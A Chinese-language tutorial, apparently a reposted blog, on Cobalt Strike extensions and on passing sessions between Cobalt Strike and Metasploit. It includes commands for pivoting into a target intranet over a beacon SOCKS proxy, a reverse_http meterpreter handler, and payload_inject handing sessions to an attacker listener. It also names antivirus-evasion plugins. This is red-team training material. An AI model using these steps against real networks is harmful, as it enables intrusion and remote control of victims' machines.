框架进阶互动利用

框架进阶互动利用

  • 一、Cobaltstrike扩展脚本
  • 二、CobaltStrike联动Metasploit
    • 2.1、联动一
    • 2.2、联动二
    • 2.3、联动三

一、Cobaltstrike扩展脚本

  • 扩展是Cobaltstrike一个极为重要的模块,它有效地丰盈了cobaltstrike的功能。
  • 选择菜单栏的CobaltStrike->脚本管理器,点击load,然后选择cna扩展文件即可,旁边的unload为去除该扩展,reload为重新加载该扩展。
  • 常用扩展插件:
    • 后渗透插件:梼杌
    • 免杀插件:bypassAV
    • 上线Linux主机:CrossC2
      框架进阶互动利用_第1张图片
      框架进阶互动利用_第2张图片
      框架进阶互动利用_第3张图片

二、CobaltStrike联动Metasploit

cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。

2.1、联动一

通过CS内置socks代理将本地MSF带入目标内网执行操作

  • 思路:利用beacon shell在目标机器和团队服务器之间建立socks,而后再在本地利用通过proxychains之类的工连到目标内网即可。

1、创建代理隧道。

框架进阶互动利用_第4张图片
框架进阶互动利用_第5张图片
在这里插入图片描述

2、查看代理信息。

框架进阶互动利用_第6张图片

3、查看团队服务器socks端口启起来了没有。

netstat -anoutlp | grep 58146

框架进阶互动利用_第7张图片

4、本地kali编辑/etc/proxychains4.conf文件,挂上团队服务器ip和socks端口,就可以直接连到目标内网(类型为socks4)

vi /etc/proxychains4.conf

框架进阶互动利用_第8张图片

扫描内网

proxychains nmap -A 192.168.9.131

框架进阶互动利用_第9张图片

5、可以用proxychains之类的工具依次代理,如果想更方便一点,直接把整个msf挂到目标内网去。

msfconsole

框架进阶互动利用_第10张图片
框架进阶互动利用_第11张图片
框架进阶互动利用_第12张图片

6、对内网进行漏洞探测。

框架进阶互动利用_第13张图片
框架进阶互动利用_第14张图片

2.2、联动二

CS beacon反弹给公网MSF

1、cs上创建应该http的外部监听器。

框架进阶互动利用_第15张图片

2、msf开启监听。

use exploit/multi/handler
set paylaod windows/meterpreter/reverse_http
set lhost 	#内部ip
set lport
exploit -j	#开启

3、回到cs上,在会话处右键,选择spawn。
4、Msf得到meterpreter。

2.3、联动三

MSF meterpreter反弹给CS

1、在cs开启一个监听。
2、Msf上执行payload注入模块。

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true		#默认情况下,payload_inject执行之后会在本地产生一个新的handler监听,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost x.x.x.x					#cobaltstrike监听的ip
set lport 8003						#cobaltstrike监听的端口
set session 1						#这里是获得的session的id
exploit

你可能感兴趣的:(web安全,学习,java,网络,服务器)